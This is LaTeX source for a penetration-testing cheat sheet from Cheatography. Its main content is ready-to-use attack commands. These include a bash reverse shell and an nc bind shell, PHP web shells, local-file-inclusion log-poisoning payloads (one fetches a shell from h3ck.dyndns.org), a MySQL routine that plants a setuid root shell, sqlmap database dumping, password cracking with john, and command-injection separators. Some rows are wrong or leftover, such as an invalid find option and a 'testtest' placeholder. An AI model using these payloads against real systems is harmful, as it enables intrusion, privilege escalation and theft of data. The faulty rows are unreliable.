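% Cheatography export of the "Pentesting Cheat Sheet" (pentesting.pdf) by vag_mour.
% Structure: preamble (packages, metadata, page geometry, row-colour helpers,
% fancyhdr header/footer), then a three-column body made of one tabularx per topic.
% The header logo is loaded from an absolute server path, so the document only
% compiles outside the generator's environment if that path is changed.
\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr} % For header and footer
\usepackage{multicol} % Allows multicols in tables
\usepackage{tabularx} % Intelligent column widths
\usepackage{tabulary} % Used in header and footer
\usepackage{hhline} % Border under tables
\usepackage{graphicx} % For images
\usepackage{xcolor} % For hex colours
%\usepackage[utf8x]{inputenc} % For unicode character support
\usepackage[T1]{fontenc} % Without this we get weird character replacements
\usepackage{colortbl} % For coloured tables
\usepackage{setspace} % For line height
\usepackage{lastpage} % Needed for total page number
\usepackage{seqsplit} % Splits long words.
%\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem} % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath} % Symbols
\usepackage{MnSymbol} % Symbols
\usepackage{wasysym} % Symbols
%\usepackage[english,german,french,spanish,italian]{babel} % Languages

% Document Info
\author{vag\_mour}
\pdfinfo{
  /Title (pentesting.pdf)
  /Creator (Cheatography)
  /Author (vag\_mour)
  /Subject (Pentesting Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit

% These two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands
% \SetRowColor{colour}: records the colour in \RowColorName (globally, from inside
% \noalign) and colours the current row; \mymulticolumn reads it back so that
% merged cells get the same background as the row they sit in.
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{54AAFF}
\definecolor{LightBackground}{HTML}{E9F4FF}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
\fancyhead[L]{
  \noindent
  \begin{multicols}{3}
    \begin{tabulary}{5.8cm}{C}
      \SetRowColor{DarkBackground}
      \vspace{-7pt}
      {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
          \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}}
      }
    \end{tabulary}
    \columnbreak
    \begin{tabulary}{11cm}{L}
      % \bfseries instead of the obsolete \bf; grouped so the size switch stays local
      \vspace{-2pt}{\large\bfseries\textcolor{DarkBackground}{\textrm{Pentesting Cheat Sheet}}} \\
      {\normalsize by \textcolor{DarkBackground}{vag\_mour} via \textcolor{DarkBackground}{\uline{cheatography.com/12578/cs/1414/}}}
    \end{tabulary}
  \end{multicols}}
\fancyfoot[L]{
  \footnotesize
  \noindent
  \begin{multicols}{3}
    \begin{tabulary}{5.8cm}{LL}
      \SetRowColor{FootBackground}
      \mymulticolumn{2}{p{5.377cm}}{\bfseries\textcolor{white}{Cheatographer}} \\
      \vspace{-2pt}vag\_mour \\
      \uline{cheatography.com/vag-mour} \\
    \end{tabulary}
    \vfill
    \columnbreak
    \begin{tabulary}{5.8cm}{L}
      \SetRowColor{FootBackground}
      \mymulticolumn{1}{p{5.377cm}}{\bfseries\textcolor{white}{Cheat Sheet}} \\
      \vspace{-2pt}Not Yet Published.\\
      Updated 12th May, 2016.\\
      Page {\thepage} of \pageref{LastPage}.
    \end{tabulary}
    \vfill
    \columnbreak
    \begin{tabulary}{5.8cm}{L}
      \SetRowColor{FootBackground}
      \mymulticolumn{1}{p{5.377cm}}{\bfseries\textcolor{white}{Sponsor}} \\
      \SetRowColor{white}
      \vspace{-5pt}
      %\includegraphics[width=48px,height=48px]{dave.jpeg}
      Measure your website readability!\\
      www.readability-score.com
    \end{tabulary}
  \end{multicols}}

\begin{document}
\raggedright
\raggedcolumns

% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.

\begin{multicols*}{3}

\begin{tabularx}{5.377cm}{x{2.09034 cm} x{2.88666 cm} }
  \SetRowColor{DarkBackground}
  \mymulticolumn{2}{x{5.377cm}}{\bfseries\textcolor{white}{Enumeration}} \tn
  % Row 0
  \SetRowColor{LightBackground}
  nmap 10.0.0.* & scanning for hosts \tn
  % Row Count 1 (+ 1)
  % Row 1
  \SetRowColor{white}
  \mymulticolumn{2}{x{5.377cm}}{nast -m -i eth0} \tn
  % Row Count 2 (+ 1)
  % Row 2
  \SetRowColor{LightBackground}
  \mymulticolumn{2}{x{5.377cm}}{nmap -sV -p U:1-65535,T:1-65535 \textless{}IP\textgreater{}} \tn
  % Row Count 3 (+ 1)
  \hhline{>{\arrayrulecolor{DarkBackground}}--}
  \SetRowColor{LightBackground}
  % NOTE(review): "testtest" looks like a leftover placeholder row -- confirm before publishing.
  \mymulticolumn{2}{x{5.377cm}}{testtest} \tn
  \hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{5.377cm}{x{3.03597 cm} x{1.94103 cm} }
  \SetRowColor{DarkBackground}
  \mymulticolumn{2}{x{5.377cm}}{\bfseries\textcolor{white}{BASH commands}} \tn
  % Row 0
  \SetRowColor{LightBackground}
  cut -d" " -f2 & delimiter " " second field \tn
  % Row Count 2 (+ 2)
  % Row 1
  \SetRowColor{white}
  % NOTE(review): find has no -u option; presumably -user was intended -- confirm.
  find / -u root & find user files \tn
  % Row Count 3 (+ 1)
  % Row 2
  \SetRowColor{LightBackground}
  echo "text" | sed 's/regex/e/' & replace with sed \tn
  % Row Count 5 (+ 2)
  % Row 3
  \SetRowColor{white}
  bash -i \textgreater{}\& \seqsplit{/dev/tcp/192.168.1.88/6666} 0\textgreater{}\&1; & shell \tn
  % Row Count 7 (+ 2)
  % Row 4
  \SetRowColor{LightBackground}
  find / -perm -4000 -type f 2\textgreater{}/dev/null & find SUID files \tn
  % Row Count 9 (+ 2)
  \hhline{>{\arrayrulecolor{DarkBackground}}--}
  \SetRowColor{LightBackground}
  \mymulticolumn{2}{x{5.377cm}}{; or ` or | to execute commands as second argument} \tn
  \hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{5.377cm}{x{2.88666 cm} x{2.09034 cm} }
  \SetRowColor{DarkBackground}
  \mymulticolumn{2}{x{5.377cm}}{\bfseries\textcolor{white}{Sharing files without Apache}} \tn
  % NOTE(review): both rows serve files with no authentication, and the python row
  % serves the whole filesystem because of the preceding cd /. SimpleHTTPServer is
  % the Python 2 module name.
  % Row 0
  \SetRowColor{LightBackground}
  nc -w 5 -v -l -p 80 \textless{} file.ext & netcat share from 80 port \tn
  % Row Count 2 (+ 2)
  % Row 1
  \SetRowColor{white}
  cd / \&\& python -m SimpleHTTPServer & python file share \tn
  % Row Count 4 (+ 2)
  \hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{5.377cm}{p{0.4977 cm} p{0.4977 cm} }
  \SetRowColor{DarkBackground}
  \mymulticolumn{2}{x{5.377cm}}{\bfseries\textcolor{white}{Mysql commands}} \tn
  \hhline{>{\arrayrulecolor{DarkBackground}}--}
  \SetRowColor{LightBackground}
  % NOTE(review): the sys_exec rows need the UDF to be loadable and mysqld to run
  % with enough privilege to chown/chmod the file; an unprivileged mysqld user and a
  % non-writable plugin directory remove both preconditions.
  \mymulticolumn{2}{x{5.377cm}}{logged in mysql as root \newline SELECT sys\_exec('touch /tmp/thisisatest'); \newline \newline int main() \newline \{ \newline setresuid(0, 0, 0); \newline setresgid(0, 0, 0); \newline system( "/bin/bash" ); \newline return 0; \newline \} \newline \newline SELECT sys\_exec('chown root.root /tmp/exploit'); \newline \newline SELECT sys\_exec('chmod +s,a+rwx /tmp/exploit'); \newline \newline -{}-{}-{}-{}-{}-{}- \newline select \seqsplit{load\_file('/etc/passwd')}} \tn
  \hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{5.377cm}{X}
  \SetRowColor{DarkBackground}
  \mymulticolumn{1}{x{5.377cm}}{\bfseries\textcolor{white}{Password decryption}} \tn
  % Row 0
  \SetRowColor{LightBackground}
  \mymulticolumn{1}{x{5.377cm}}{\seqsplit{/pentest/passwords/john\#} john -{}-rules -{}-wordlist=/pentest/passwords/wordlists/darkc0de.lst -{}-users=aadams /root/de-ice/aa} \tn
  % Row Count 3 (+ 3)
  % Row 1
  \SetRowColor{white}
  \mymulticolumn{1}{x{5.377cm}}{./john /tmp/hash -{}-format=raw-md5} \tn
  % Row Count 4 (+ 1)
  % Row 2
  \SetRowColor{LightBackground}
  \mymulticolumn{1}{x{5.377cm}}{echo \textless{}base64string\textgreater{} | base64 -{}-decode} \tn
  % Row Count 5 (+ 1)
  \hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{5.377cm}{x{1.09494 cm} x{3.88206 cm} }
  \SetRowColor{DarkBackground}
  \mymulticolumn{2}{x{5.377cm}}{\bfseries\textcolor{white}{LFI attack}} \tn
  % NOTE(review): every row depends on user-controlled input reaching an include and
  % on readable log or /proc files; the data:// row presumably also needs
  % allow_url_include enabled. Allow-listing include paths and leaving
  % allow_url_include off are the corresponding hardening points.
  % Row 0
  \SetRowColor{LightBackground}
  php streams & \seqsplit{index.php?page=data://text/plain},\textless{}?php \seqsplit{system\%28\%22uname\%20-a\%22\%29;\%20}?\%3E \tn
  % Row Count 3 (+ 3)
  \hhline{>{\arrayrulecolor{DarkBackground}}--}
  \SetRowColor{LightBackground}
  \mymulticolumn{2}{x{5.377cm}}{URL \seqsplit{http://blah/access.log\&cmd=ls} \newline \newline \newline error.log no links inside \newline http://blah/ {[}payload{]} encoded in url only \newline \newline telnet + user agent can be used \newline access.log or user agent \newline GET /\textless{}? exec('wget \seqsplit{http://h3ck.dyndns.org/ani.txt} -O shell.php');?\textgreater{} \newline \newline GET /\textless{} ?php phpinfo(); ? \textgreater{} \newline \newline -{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}- \newline lfi + auth.log writable + ssh command execution \newline \newline ssh '\textless{}pre\textgreater{}\textless{}?php echo system(\$\_GET{[}"cmd"{]}); exit; ?\textgreater{}'@h3ck.dyndns.org \newline -{}-{}-{}-- \newline /proc/self/environ -\textgreater{} user agent \newline /proc/self/cmdline \newline /proc/self/fd/1,2,3..} \tn
  \hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{5.377cm}{X}
  \SetRowColor{DarkBackground}
  \mymulticolumn{1}{x{5.377cm}}{\bfseries\textcolor{white}{Php executing commands}} \tn
  % NOTE(review): each row is an unauthenticated web shell driven by a request
  % parameter; a file containing such a string on a host should be treated as an
  % indicator of compromise.
  % Row 0
  \SetRowColor{LightBackground}
  \mymulticolumn{1}{x{5.377cm}}{\textless{}?php system(\$\_REQUEST{[}'cmd'{]}); ?\textgreater{}} \tn
  % Row Count 1 (+ 1)
  % Row 1
  \SetRowColor{white}
  \mymulticolumn{1}{x{5.377cm}}{\textless{}? Php \$ handler = popen (\$ \_GET {[}'cmd'{]}, 'r'); \$ read = fread (\$ handler, 2096); echo \$ read;?\textgreater{}} \tn
  % Row Count 3 (+ 2)
  % Row 2
  \SetRowColor{LightBackground}
  \mymulticolumn{1}{x{5.377cm}}{wget -O /tmp/bd.php \textless{}url\_to\_malicious\_file\textgreater{} \&\& php -f /tmp/bd.php} \tn
  % Row Count 5 (+ 2)
  \hhline{>{\arrayrulecolor{DarkBackground}}-}
  \SetRowColor{LightBackground}
  \mymulticolumn{1}{x{5.377cm}}{functions exec, shell\_exec, passthru} \tn
  \hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{5.377cm}{x{2.4885 cm} x{2.4885 cm} }
  \SetRowColor{DarkBackground}
  \mymulticolumn{2}{x{5.377cm}}{\bfseries\textcolor{white}{Pseudo-terminal to real shell}} \tn
  % Row 0
  \SetRowColor{LightBackground}
  % NOTE(review): "pataw" in the right-hand cell looks like a typo -- confirm the intended wording.
  \textasciicircum{}python -c 'import pty; pty.spawn("/bin/bash");'\textasciicircum{} & for exit pataw ctrl + v ctrl + c {[} enter{]} \tn
  % Row Count 3 (+ 3)
  % Row 1
  \SetRowColor{white}
  nc -l -p 6666 -e /bin/bash & nc IP 6666 \tn
  % Row Count 5 (+ 2)
  \hhline{>{\arrayrulecolor{DarkBackground}}--}
  \SetRowColor{LightBackground}
  \mymulticolumn{2}{x{5.377cm}}{echo os.system('/bin/bash') \newline /bin/sh -i} \tn
  \hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{5.377cm}{p{0.4977 cm} p{0.4977 cm} }
  \SetRowColor{DarkBackground}
  \mymulticolumn{2}{x{5.377cm}}{\bfseries\textcolor{white}{SQL injection}} \tn
  % Row 0
  \SetRowColor{LightBackground}
  \mymulticolumn{2}{x{5.377cm}}{./sqlmap.py -u http://192.168.60.138 -{}-forms} \tn
  % Row Count 1 (+ 1)
  % Row 1
  \SetRowColor{white}
  \mymulticolumn{2}{x{5.377cm}}{./sqlmap.py -u http://192.168.60.138 -{}-forms -{}-risk=3 -{}-level=3 -{}-dbs} \tn
  % Row Count 3 (+ 2)
  % Row 2
  \SetRowColor{LightBackground}
  \mymulticolumn{2}{x{5.377cm}}{./sqlmap.py -u http://192.168.60.138 -{}-forms -{}-risk=3 -{}-level=3 -D members -{}-dump} \tn
  % Row Count 5 (+ 2)
  \hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{5.377cm}{X}
  \SetRowColor{DarkBackground}
  \mymulticolumn{1}{x{5.377cm}}{\bfseries\textcolor{white}{Wordlists \& Exploits}} \tn
  % Row 0
  \SetRowColor{LightBackground}
  \mymulticolumn{1}{x{5.377cm}}{\seqsplit{/pentest/passwords/john/password}.lst} \tn
  % Row Count 1 (+ 1)
  % Row 1
  \SetRowColor{white}
  \mymulticolumn{1}{x{5.377cm}}{\seqsplit{/opt/framework/msf3/data/john/wordlists/password}.lst} \tn
  % Row Count 3 (+ 2)
  % Row 2
  \SetRowColor{LightBackground}
  \mymulticolumn{1}{x{5.377cm}}{\seqsplit{http://wiki.skullsecurity.org/Passwords}} \tn
  % Row Count 4 (+ 1)
  % Row 3
  \SetRowColor{white}
  \mymulticolumn{1}{x{5.377cm}}{\textasciicircum{}cd \seqsplit{/pentest/exploits/exploitdb/} cat files.csv | grep -i wordpress | grep 1.5.1\textasciicircum{}} \tn
  % Row Count 6 (+ 2)
  \hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% That's all folks
\end{multicols*}

\end{document}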